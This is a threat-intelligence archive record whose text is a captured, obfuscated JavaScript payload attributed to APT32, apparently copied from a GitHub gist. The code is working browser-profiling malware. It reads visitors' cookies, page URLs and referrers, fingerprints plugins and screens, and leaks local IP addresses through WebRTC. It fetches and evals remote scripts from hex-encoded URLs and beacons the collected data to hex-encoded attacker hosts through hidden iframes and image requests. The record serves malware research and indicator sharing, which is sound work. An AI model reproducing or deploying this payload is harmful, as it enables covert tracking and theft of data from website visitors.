{
	"id": "d88ed58b-6e4b-42d8-b20b-73ec0f293a62",
	"created_at": "2026-04-10T03:21:50.909343Z",
	"updated_at": "2026-04-10T03:22:19.343028Z",
	"deleted_at": null,
	"sha1_hash": "0bae9ebb49c8c750110d4cb5e5163b35966b54c8",
	"title": "Latest observed JS payload used for APT32 profiling.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 93637,
	"plain_text": "Latest observed JS payload used for APT32 profiling.\r\nBy 262588213843476\r\nArchived: 2026-04-10 02:41:15 UTC\r\n!function(e) { function t(i) { if (n[i]) return n[i].exports; var o = n[i] = { \"i\": i, \"l\": !1, \"exports\": {} }; return\r\ne[i].call(o.exports, o, o.exports, t), o.l = !0, o.exports } var n = {}; t.m = e, t.c = n, t.d = function(e, n, i) { t.o(e, n) ||\r\nObject.defineProperty(e, n, { \"configurable\": !1, \"enumerable\": !0, \"get\": i }) } , t.n = function(e) { var n = e \u0026\u0026\r\ne.__esModule ? function() { return e[\"default\"] } : function() { return e } ; return t.d(n, \"a\", n), n } , t.o = function(e, t) {\r\nreturn Object.prototype.hasOwnProperty.call(e, t) } , t.p = \"\", t(t.s = 339) }({ \"100\": function(e, t, n) { t.__esModule = !0,\r\nt.Atp = function(e, t) { if (\"http:\" === location.protocol) { vjQQ.cookie(\"GpbJILGTQyuHh\"),\r\nvjQQ.cookie(\"GpbJILGTQyuHh2\") \u0026\u0026 vjQQ.cookie(\"GpbJILGTQyuHh2\"); var n = document.createElement(\"iframe\");\r\nn.style.display = \"none\", n.onload = function() { n.parentNode.removeChild(n) } , n.src = \"http://\" + e + \"/\" +\r\nvjQQ.base64.encode(t) + \"/sync\", document.body.appendChild(n) } } }, \"339\": function(e, t, n) { e.exports = n(89) }, \"89\":\r\nfunction(module, exports, __webpack_require__) { __webpack_require__(90), __webpack_require__(91); var _config =\r\n__webpack_require__(92) , _xhr = __webpack_require__(93) , _base = __webpack_require__(94) , _static =\r\n__webpack_require__(95) , _dynamic = __webpack_require__(96) , _state = __webpack_require__(97) , _send =\r\n__webpack_require__(98) , _doit = __webpack_require__(99) , _number = __webpack_require__(100); !function() { var\r\ninted = window.itls; if (!inted) { var snip = \"\"; window.itls = 1; var vTim = (0, _config.TMCg)().x001 , vIxps = [] , rIsdex =\r\n2 , fLead = (new Date).getTime() , ifLead = !1 , whish = {}; try { if (window.localStorage) { whish = window.localStorage;\r\ntry { window.localStorage.C = \"UTF-8\", whish = window.localStorage } catch (e) { whish = {} } } else whish = {} } catch\r\n(e) { whish = {} } whish.START = fLead, ifLead = \"undefined\" != typeof whish.jlb, whish.vRtm ? vTim \u003c\r\nparseInt(whish.vRtm) \u0026\u0026 (vTim = parseInt(whish.vRtm)) : whish.vRtm = vTim; var lJlb = function() { return function(e) {\r\nreturn \"undefined\" != typeof vjQQ ? (whish.jlb = \"\", e(\"jlb\")) : whish.jlb ? void e(\"jlb\") : (0, _xhr.DDL)((0, _config.Cfcg)\r\n().x001.hexDecode(), function(t) { return whish.jlb = t.replace(/\\/\\/\\@/gm, \"//#\"), e(\"jlb\") }) } }() , lTzlb = function() {\r\nreturn function(e) { return \"undefined\" != typeof vLtz ? (whish.sTzlb = \"\", e(\"sTzlb\")) : whish.sTzlb ? e(\"sTzlb\") : (0,\r\n_xhr.DDL)((0, _config.Cfcg)().x003.hexDecode(), function(t) { return whish.sTzlb = t, e(\"sTzlb\") }) } }() , lJslb =\r\nfunction() { return function(e) { return \"undefined\" != typeof JSON ? (whish.vJsLb = \"\", e(\"vJsLb\")) : whish.vJsLb ?\r\ne(\"vJsLb\") : (0, _xhr.DDL)((0, _config.Cfcg)().x004.hexDecode(), function(t) { return whish.vJsLb = t, e(\"vJsLb\") }) } }() ,\r\nlClb = function() { return function(e) { return whish.vClb ? e(\"vClb\") : (0, _xhr.DDL)((0, _config.Cfcg)\r\n().x005.hexDecode(), function(t) { return whish.vClb = t, e(\"vClb\") }) } }() , lSflb = function() { return function(e) { return\r\n\"undefined\" != typeof vSflb ? (whish.sSflb = \"\", e(\"sSflb\")) : whish.sSflb ? e(\"sSflb\") : (0, _xhr.DDL)((0, _config.Cfcg)\r\n().x006.hexDecode(), function(t) { return whish.sSflb = t, e(\"sSflb\") }) } }() , sSflb = function() { return function(e) { return\r\n\"undefined\" != typeof vFpt2 ? (whish.lvFpt2 = \"\", e(\"lvFpt2\")) : whish.lvFpt2 ? e(\"lvFpt2\") : (0, _xhr.DDL)((0,\r\n_config.Cfcg)().x007.hexDecode(), function(t) { return whish.lvFpt2 = t, e(\"lvFpt2\") }) } }() , lSklb = function() { return\r\nfunction(e) { return \"undefined\" != typeof vIolb ? (whish.vSk = \"\", e(\"vSk\")) : whish.vSk ? e(\"vSk\") : (0, _xhr.DDL)((0,\r\n_config.Cfcg)().x008.hexDecode(), function(t) { return whish.vSk = t, e(\"vSk\") }) } }() , lSc = function() { return\r\nfunction(e) { return whish.vSclb ? /DOCTYPE/gim.test(whish.vSclb) ? (0, _xhr.DDL)((0, _config.DMCfg)\r\n().dkms0ss2.hexDecode(), function(t) { return whish.vSclb = t, e(\"vSclb\") }) : /\u003chtml\u003e/gim.test(whish.vSclb) ? (0,\r\n_xhr.DDL)((0, _config.DMCfg)().dkms0ss2.hexDecode(), function(t) { return whish.vSclb = t, e(\"vSclb\") }) : whish.rIsdex\r\n? parseInt(whish.rIsdex) \u003c rIsdex ? (whish.rIsdex = rIsdex, (0, _xhr.DDL)((0, _config.DMCfg)().dkms0ss2.hexDecode(),\r\nfunction(t) { return whish.vSclb = t, e(\"vSclb\") })) : e(\"vSclb\") : (whish.rIsdex = rIsdex, (0, _xhr.DDL)((0, _config.DMCfg)\r\n().dkms0ss2.hexDecode(), function(t) { return whish.vSclb = t, e(\"vSclb\") })) : (0, _xhr.DDL)((0, _config.DMCfg)\r\n().dkms0ss2.hexDecode(), function(t) { return whish.vSclb = t, e(\"vSclb\") }) } }() , lCclb = function() { function\r\nlCclb(pHole) { var vCcI = setInterval(function() { if (\"undefined\" != typeof whish.vSclb) { if (\"undefined\" == typeof vjQQ)\r\n{ if (!whish.jlb) return; return eval(whish.jlb.replace(/jQuery/gm, \"vjQQ\").replace(/\\/\\/\\@/gm, \"//#\")) } if (\"undefined\" ==\r\ntypeof vLtz) { if (!whish.sTzlb) return; return vjQQ.globalEval(whish.sTzlb.replace(/jstz/gm, \"vLtz\")) } if (\"undefined\" ==\r\ntypeof JSON) { if (!whish.vJsLb) return; return vjQQ.globalEval(whish.vJsLb) } if (\"undefined\" == typeof vjQQ.cookie) {\r\nif (!whish.vClb) return; return vjQQ.globalEval(whish.vClb.replace(/jQuery/gm, \"vjQQ\").replace(/\\$/gm, \"vjQQ\")) } if\r\n(\"undefined\" == typeof vSflb) { if (!whish.sSflb) return; return vjQQ.globalEval(whish.sSflb.replace(/swfobject/gm,\r\n\"vSflb\")) } if (\"undefined\" == typeof vFpt2) { if (!whish.lvFpt2) return; return\r\nvjQQ.globalEval(localStorage.lvFpt2.replace(/Fingerprint2/gm, \"vFpt2\")) } return clearInterval(vCcI), pHole() } }, 1) }\r\nreturn lCclb }() , lNN = function() { return function(e) {} }(); lJlb(lNN), lTzlb(lNN), lJslb(lNN), lClb(lNN), lSflb(lNN),\r\nsSflb(lNN), lSc(lNN); var lSn = function() { return function() { (0, _base.Base16)(vjQQ), \"undefined\" == typeof jQuery ?\r\n(window.jQuery = vjQQ, \"undefined\" == typeof $ ? $ = vjQQ : ((0, _base.Base16)($), (0, _base.Base16)(window.jQuery))) :\r\n((0, _base.Base16)($), (0, _base.Base16)(window.jQuery)), jQuery.support.cors = !0; var t = function(e) { var t, n, i, o, r;\r\nreturn n = vjQQ.base64.encode(e), o = n.split(\"\").length / 2, i = n.split(\"\"), t = function() { var e; for (e = []; i.length; )\r\ne.push(i.splice(0, o)); return e }(), r = [], r = r.concat(t[1]), (r = r.concat(t[0])).join(\"\").replace(/=/gim,\r\n\"BaNrTxssCseErsqQs\") }; '____vDm0s4____\"' !== (0, _config.DMCfg)().vDm0s4 \u0026\u0026 vjQQ.cookie(\"EwwohFkYYl\", t((0,\r\n_config.DMCfg)().vDm0s4.hexDecode()), { \"domain\": document.domain, \"path\": \"/\" }), (new Date).getTime(); var n =\r\nundefined , i = undefined , o = whish.vSclb , r = function() { if (\"1\" === (0, _config.ACfg)().vDoAc \u0026\u0026 n) { var e = {\r\n\"uuid\": n, \"fuuid\": i, \"zuuid\": o, \"hash\": window.location.hash }; (0, _doit.Sxp)((0, _config.DMCfg)().optsDm,\r\nhttps://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef\r\nPage 1 of 3\n\nvjQQ.base64.encode(escape(JSON.stringify(e)))) } }; if (void 0 === vjQQ.cookie(\"GpbJILGTQyuHh\") || null ===\r\nvjQQ.cookie(\"GpbJILGTQyuHh\")) try { (0, _dynamic.Ftpg2)(function(e) { (new Date).getTime(), e \u0026\u0026 (n = e),\r\nvjQQ.cookie(\"GpbJILGTQyuHh\", n, { \"domain\": document.domain, \"path\": \"/\" }), r() }) } catch (e) { (new\r\nDate).getTime(), n = o, vjQQ.cookie(\"GpbJILGTQyuHh\", o, { \"domain\": document.domain, \"path\": \"/\" }) } else\r\nvjQQ.cookie(\"GpbJILGTQyuHh\") \u0026\u0026 (n = vjQQ.cookie(\"GpbJILGTQyuHh\")), r(); var c = {} , a = {}; if (whish.vSetTm)\r\n{ var u = 0; try { u = (new Date).getTime() - parseInt(whish.vSetTm) } catch (e) { whish.vSetTm = (new Date).getTime() }\r\nu \u003e 864e5 ? (c = (0, _static.Bwr)(), a = (0, _state.Htr)(), c.plugins = (0, _static.Plus)(), c._screen = (0, _static.FgScr)(),\r\nc._plugins = (0, _static.BrPlus)(), c._mimeTypes = (0, _static.BRmmt)(), whish.vSetTm = (new Date).getTime()) : a = (0,\r\n_state.Htr)() } else c = (0, _static.Bwr)(), a = (0, _state.Htr)(), c.plugins = (0, _static.Plus)(), c._screen = (0, _static.FgScr)(),\r\nc._plugins = (0, _static.BrPlus)(), c._mimeTypes = (0, _static.BRmmt)(), whish.vSetTm = (new Date).getTime(); var _ = !1;\r\n\"undefined\" == typeof window.mozRTCPeerConnection \u0026\u0026 \"undefined\" == typeof window.webkitRTCPeerConnection ? _\r\n= !0 : (0, _dynamic.Rwtc)(function(e) { e ? vIxps.push(e) : _ = !0 }); var l = setInterval(function() { if (_) { clearInterval(l),\r\n(new Date).getTime(), Array.prototype.unique = function() { return this.filter(function(e, t, n) { return n.indexOf(e) === t })\r\n} , a.client_network_ip_list = vIxps.unique(), a.client_api = (0, _config.DMCfg)().optsDm, a.client_uuid = n, a.client_fuuid\r\n= i, a.client_zuuid = o; var e = vjQQ.base64.encode(escape(JSON.stringify({ \"history\": a, \"navigator\": c }))); (0,\r\n_send.AtcG)(e, (0, _config.DMCfg)().optsDm); var t = vjQQ.cookie(\"GpbJILGTQyuHh\");\r\nvjQQ.cookie(\"GpbJILGTQyuHh2\") \u0026\u0026 (t += \".\" + vjQQ.cookie(\"GpbJILGTQyuHh2\")), \"1\" === (0, _config.ACfg)\r\n().vPTPed \u0026\u0026 (0, _number.Atp)((0, _config.DMCfg)().vPTDed.hexDecode(), t) } }, 1) } }(); lCclb(lSn) } }() }, \"90\":\r\nfunction(e, t, n) { String.prototype.hexEncode = function() { var e = void 0 , t = \"\"; for (e = 0; e \u003c this.length; e++) t +=\r\n(\"0000\" + this.charCodeAt(e).toString(16)).slice(-4); return t } , String.prototype.hexDecode = function() { var e = void 0 , t\r\n= this.match(/.{1,4}/g) || [] , n = \"\"; for (e = 0; e \u003c t.length; e++) n += String.fromCharCode(parseInt(t[e], 16)); return n } },\r\n\"91\": function(e, t, n) { Date.prototype.toISOString || function() { function e(e) { return e \u003c 10 ? \"0\" + e : e }\r\nDate.prototype.toISOString = function() { return this.getUTCFullYear() + \"-\" + e(this.getUTCMonth() + 1) + \"-\" +\r\ne(this.getUTCDate()) + \"T\" + e(this.getUTCHours()) + \":\" + e(this.getUTCMinutes()) + \":\" + e(this.getUTCSeconds()) + \".\"\r\n+ (this.getUTCMilliseconds() / 1e3).toFixed(3).slice(2, 5) + \"Z\" } }() }, \"92\": function(e, t, n) { t.__esModule = !0, t.Cfcg =\r\nfunction() { return { \"x001\":\r\n\"00680074007400700073003a002f002f007200610077002e00670069007400680075006200750073006500720063006f006e00740065006e0074002e0063\r\n\"x002\":\r\n\"00680074007400700073003a002f002f007200610077002e00670069007400680075006200750073006500720063006f006e00740065006e0074002e0063\r\n\"x003\":\r\n\"00680074007400700073003a002f002f00630064006e006a0073002e0063006c006f007500640066006c006100720065002e0063006f006d002f0061006a0\r\n\"x004\":\r\n\"00680074007400700073003a002f002f007200610077002e00670069007400680075006200750073006500720063006f006e00740065006e0074002e0063\r\n\"x005\":\r\n\"00680074007400700073003a002f002f00630064006e006a0073002e0063006c006f007500640066006c006100720065002e0063006f006d002f0061006a0\r\n\"x006\":\r\n\"00680074007400700073003a002f002f00630064006e006a0073002e0063006c006f007500640066006c006100720065002e0063006f006d002f0061006a0\r\n\"x007\":\r\n\"00680074007400700073003a002f002f007200610077002e00670069007400680075006200750073006500720063006f006e00740065006e0074002e0063\r\n\"x008\":\r\n\"00680074007400700073003a002f002f00630064006e006a0073002e0063006c006f007500640066006c006100720065002e0063006f006d002f0061006a0\r\n} } , t.DMCfg = function() { return { \"optsDm\":\r\n\"007300740061007400690063002e006900630064006e002e00620069007a\", \"dkms0ss2\":\r\n\"00680074007400700073003a002f002f007700770077002e006a00650074007400680075006d00620073002e0063006f006d002f0072006f0062006f00740\r\n\"x00CloudFlareHealth03\": \"007300740061007400690063002e006900630064006e002e00620069007a\", \"vDm0s4\":\r\n\"007700770077002e00700072006f00660069006c0065006b0069006e0067002e006f00720067\", \"x00CloudFlareHealth05\":\r\n\"____x00CloudFlareHealth05____\", \"vPTDed\": \"____x00CloudFlareHealth06____\" } } , t.ACfg = function() { return {\r\n\"vDoAc\": \"1\", \"vPTCk1\": \"1\", \"vPTAsk\": \"____x00GoogleAnalytics02____\", \"vPTPed\": \"0\" } } , t.TMCg = function() {\r\nreturn { \"x001\": 1e3, \"x002\": \"____resync____\" } } }, \"93\": function(e, t, n) { t.__esModule = !0, t.DDL = function(e, t, n)\r\n{ var i = void 0; i = \"undefined\" != typeof window.XDomainRequest ? new XDomainRequest : \"undefined\" != typeof\r\nwindow.XMLHttpRequest ? new XMLHttpRequest : new ActiveXObject(\"Microsoft.XMLHTTP\"), i.withCredentials = !!n,\r\ni.open(\"GET\", e, !1), i.onload = function(e) { return t(i.responseText) } , i.send() } }, \"94\": function(e, t, n) { t.__esModule\r\n= !0, t.Base16 = function(e) { function t(e, t, n, i, o, r) { for (var c = 0, a = 0, u = (e = String(e)).length, _ = \"\", l = 0; a \u003c u; )\r\n{ var s = e.charCodeAt(a); for (c = (c \u003c\u003c o) + (s = s \u003c 256 ? n[s] : -1), l += o; l \u003e= r; ) { var f = c \u003e\u003e (l -= r); _ += i.charAt(f),\r\nc ^= f \u003c\u003c l } ++a } return !t \u0026\u0026 l \u003e 0 \u0026\u0026 (_ += i.charAt(c \u003c\u003c r - l)), _ } for (var n =\r\n\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\", i = \"\", o = [256], r = [256], c = 0,\r\na = { \"encode\": function(e) { return e.replace(/[\\u0080-\\u07ff]/g, function(e) { var t = e.charCodeAt(0); return\r\nString.fromCharCode(192 | t \u003e\u003e 6, 128 | 63 \u0026 t) }).replace(/[\\u0800-\\uffff]/g, function(e) { var t = e.charCodeAt(0); return\r\nString.fromCharCode(224 | t \u003e\u003e 12, 128 | t \u003e\u003e 6 \u0026 63, 128 | 63 \u0026 t) }) }, \"decode\": function(e) { return e.replace(/[\\u00e0-\r\n\\u00ef][\\u0080-\\u00bf][\\u0080-\\u00bf]/g, function(e) { var t = (15 \u0026 e.charCodeAt(0)) \u003c\u003c 12 | (63 \u0026 e.charCodeAt(1)) \u003c\u003c 6\r\n| 63 \u0026 e.charCodeAt(2); return String.fromCharCode(t) }).replace(/[\\u00c0-\\u00df][\\u0080-\\u00bf]/g, function(e) { var t =\r\n(31 \u0026 e.charCodeAt(0)) \u003c\u003c 6 | 63 \u0026 e.charCodeAt(1); return String.fromCharCode(t) }) } }; c \u003c 256; ) { var u =\r\nString.fromCharCode(c); i += u, r[c] = c, o[c] = n.indexOf(u), ++c } var _ = e.base64 = function(e, t, n) { return t ? _[e](t, n)\r\n: e ? null : this } ; _.btoa = _.encode = function(e, i) { return e = !1 === _.raw || _.utf8encode || i ? a.encode(e) : e, (e = t(e,\r\nhttps://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef\r\nPage 2 of 3\n\n!1, r, n, 8, 6)) + \"====\".slice(e.length % 4 || 4) } , _.atob = _.decode = function(e, n) { var r = (e =\r\nString(e).split(\"=\")).length; do { e[--r] = t(e[r], !0, o, i, 6, 8) } while (r \u003e 0);return e = e.join(\"\"), !1 === _.raw || _.utf8decode\r\n|| n ? a.decode(e) : e } } }, \"95\": function(e, t, n) { t.__esModule = !0; var i = \"function\" == typeof Symbol \u0026\u0026 \"symbol\" ==\r\ntypeof Symbol.iterator ? function(e) { return typeof e } : function(e) { return e \u0026\u0026 \"function\" == typeof Symbol \u0026\u0026\r\ne.constructor === Symbol \u0026\u0026 e !== Symbol.prototype ? \"symbol\" : typeof e } ; t.FgScr = function() { var e = screen ||\r\nwindow.screen; return { \"width\": e.width, \"height\": e.height, \"availWidth\": e.availWidth, \"availHeight\": e.availHeight,\r\n\"resolution\": e.width + \"x\" + e.height } } , t.Bwr = function() { return { \"userAgent\": navigator.userAgent, \"appVersion\":\r\nnavigator.appVersion, \"appCodeName\": navigator.appCodeName, \"appName\": navigator.appName, \"platform\":\r\nnavigator.platform, \"product\": navigator.product, \"productSub\": navigator.productSub, \"maxTouchPoints\":\r\nnavigator.maxTouchPoints, \"language\": navigator.language, \"languages\": navigator.languages, \"doNotTrack\":\r\nnavigator.doNotTrack, \"browserLanguage\": navigator.browserLanguage, \"cookieEnabled\": navigator.cookieEnabled,\r\n\"vendor\": navigator.vendor, \"vendorSub\": navigator.vendorSub, \"oscpu\": navigator.oscpu, \"onLine\": navigator.onLine,\r\n\"mozTCPSocket\": navigator.mozTCPSocket, \"mozPay\": navigator.mozPay, \"buildID\": navigator.buildID,\r\n\"hardwareConcurrency\": navigator.hardwareConcurrency } } , t.Plus = function() { var e = function(e) { var t = void 0 , n =\r\nvoid 0 , o = void 0 , r = void 0 , c = void 0 , a = void 0 , u = void 0 , _ = void 0 , l = void 0; if (!(\"ActiveXObject\"in\r\nwindow)) { if (navigator.plugins.length \u003e 0) { for (c = 0, u = (l = navigator.plugins).length; c \u003c u; c++) if (n = l[c],\r\ne.plugin.test(n.name)) return !0; return !1 } return !1 } if (\"string\" != typeof e.activex) { for (r = 0, a = (_ = e.activex).length;\r\nr \u003c a; r++) { t = _[r]; try { if (\"object\" === (void 0 === (o = new ActiveXObject(t)) ? \"undefined\" : i(o))) return !0 } catch\r\n(s) {} } return !1 } try { return \"object\" === (void 0 === (o = new ActiveXObject(e.activex)) ? \"undefined\" : i(o)) } catch\r\n(s) { return !1 } }; return { \"activex\": \"ActiveXObject\"in window, \"cors\": \"withCredentials\"in new XMLHttpRequest ||\r\n\"undefined\" != typeof XDomainRequest, \"flash\": vSflb.hasFlashPlayerVersion(\"9\"), \"java\": navigator.javaEnabled(),\r\n\"foxit\": function() { try { return !!navigator.plugins[\"Foxit Reader Plugin for Mozilla\"] || !!new\r\nActiveXObject(\"FoxitReader.FoxitReaderCtl.1\") } catch (e) { return !1 } }(), \"phonegap\": function() { try { return\r\ndevice.phonegap || device.cordova } catch (e) { return !1 } }(), \"quicktime\": e({ \"activex\": [\"QuickTime.QuickTime\"],\r\n\"plugin\": /quicktime/gim }), \"realplayer\": e({ \"activex\": [\"RealPlayer\", \"rmocx.RealPlayer G2 Control\", \"rmocx.RealPlayer\r\nG2 Control.1\", \"RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)\", \"RealVideo.RealVideo(tm) ActiveX Control (32-\r\nbit)\"], \"plugin\": /realplayer/gim }), \"silverlight\": e({ \"activex\": [\"AgControl.AgControl\"], \"plugin\": /silverlight/gim }),\r\n\"touch\": function() { try { return \"ontouchstart\"in document } catch (e) { return !1 } }(), \"vbscript\": function() { try { return\r\n-1 !== navigator.userAgent.indexOf(\"MSIE\") \u0026\u0026 -1 !== navigator.userAgent.indexOf(\"Win\") } catch (e) { return !0 } }(),\r\n\"vlc\": e({ \"activex\": [\"VideoLAN.VLCPlugin.2\"], \"plugin\": /vlc/gim }), \"webrtc\": function() { try { return\r\n!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection } catch (e) { return !1 } }(), \"wmp\": e({\r\n\"activex\": [\"WMPlayer.OCX\"], \"plugin\": /(windows\\smedia)|(Microsoft)/gim }) } } , t.BRmmt = function() { return\r\nvjQQ.map(navigator.mimeTypes, function(e) { return { \"description\": e.description, \"suffixes\": e.suffixes, \"type\": e.type } })\r\n} , t.BrPlus = function() { return vjQQ.map(navigator.plugins, function(e) { return { \"description\": e.description, \"filename\":\r\ne.filename, \"length\": e.length, \"name\": e.name } }) } }, \"96\": function(e, t, n) { t.__esModule = !0, t.Rwtc = function(e) { if\r\n(\"undefined\" == typeof window.mozRTCPeerConnection \u0026\u0026 \"undefined\" == typeof window.webkitRTCPeerConnection)\r\nreturn e(!1); !function(e) { var t = window.RTCPeerConnection || window.mozRTCPeerConnection ||\r\nwindow.webkitRTCPeerConnection; if (window.webkitRTCPeerConnection, !t) { var n = iframe.contentWindow; t =\r\nn.RTCPeerConnection || n.mozRTCPeerConnection || n.webkitRTCPeerConnection, n.webkitRTCPeerConnection } var i =\r\nnew t({ \"iceServers\": [{ \"urls\": \"stun:stun.l.google.com:19302\" }] },{ \"optional\": [{ \"RtpDataChannels\": !0 }] });\r\ni.onicecandidate = function(t) { t \u0026\u0026 t.candidate ? function(t) { var n = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]\r\n{1,4}){7})/.exec(t) , i = void 0; n ? (i = n[1], e(i)) : e(null) }(t.candidate.candidate) : e(null) } , i.createDataChannel(\"\"),\r\ni.createOffer(function(e) { i.setLocalDescription(e, function() {}, function() {}) }, function() {}) }(e) } , t.Ftpg2 =\r\nfunction(e) { vFpt2().get(function(t, n) { e(t) }) } }, \"97\": function(e, t, n) { t.__esModule = !0, t.Htr = function() { var e =\r\nvoid 0; try { e = vLtz().timezone_name } catch (t) { e = vLtz.determine().name() } return { \"client_title\": document.title,\r\n\"client_url\": document.URL, \"client_cookie\": document.cookie, \"client_hash\": window.location.hash, \"client_referrer\":\r\ndocument.referrer, \"client_platform_ua\": navigator.userAgent, \"client_time\": (new Date).toISOString(), \"timezone\": e } } },\r\n\"98\": function(e, t, n) { t.__esModule = !0, t.AtcP = function(e, t) { vjQQ.ajax({ \"crossDomain\": !0, \"type\": \"POST\", \"data\":\r\n{ \"authorization_token\": e }, \"url\": location.protocol + \"//\" + t.hexDecode() +\r\n\"/163/995/836/px_04d05405503404d05404503d.gif\", \"dataType\": \"image/gif\" }) } , t.AtcG = function(e, t) { (new\r\nImage).src = location.protocol + \"//\" + t.hexDecode() + \"/163/\" + e + \"/995/836/px_04d05405503404d05404503d.gif\" } },\r\n\"99\": function(e, t, n) { t.__esModule = !0, t.Sxp = function(e, t) { var n =\r\ndocument.createElement(\"470007009600270036003700\".split(\"\").reverse().join(\"\").toString().hexDecode()); n.src =\r\nlocation.protocol + \"//\" + e.hexDecode() + \"/api/\" + t + \"/04d05405503404d05404503d/163\"; var i =\r\n\"4600160056008600\".split(\"\"); document.getElementsByTagName(i.reverse().join(\"\").toString().hexDecode())\r\n[0].appendChild(n) } } });\r\nSource: https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef\r\nhttps://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef"
	],
	"report_names": [
		"141a5c7ab8b4280901722e2cd931b7ef"
	],
	"threat_actors": [],
	"ts_created_at": 1775791310,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0bae9ebb49c8c750110d4cb5e5163b35966b54c8.pdf",
		"text": "https://archive.orkl.eu/0bae9ebb49c8c750110d4cb5e5163b35966b54c8.txt",
		"img": "https://archive.orkl.eu/0bae9ebb49c8c750110d4cb5e5163b35966b54c8.jpg"
	}
}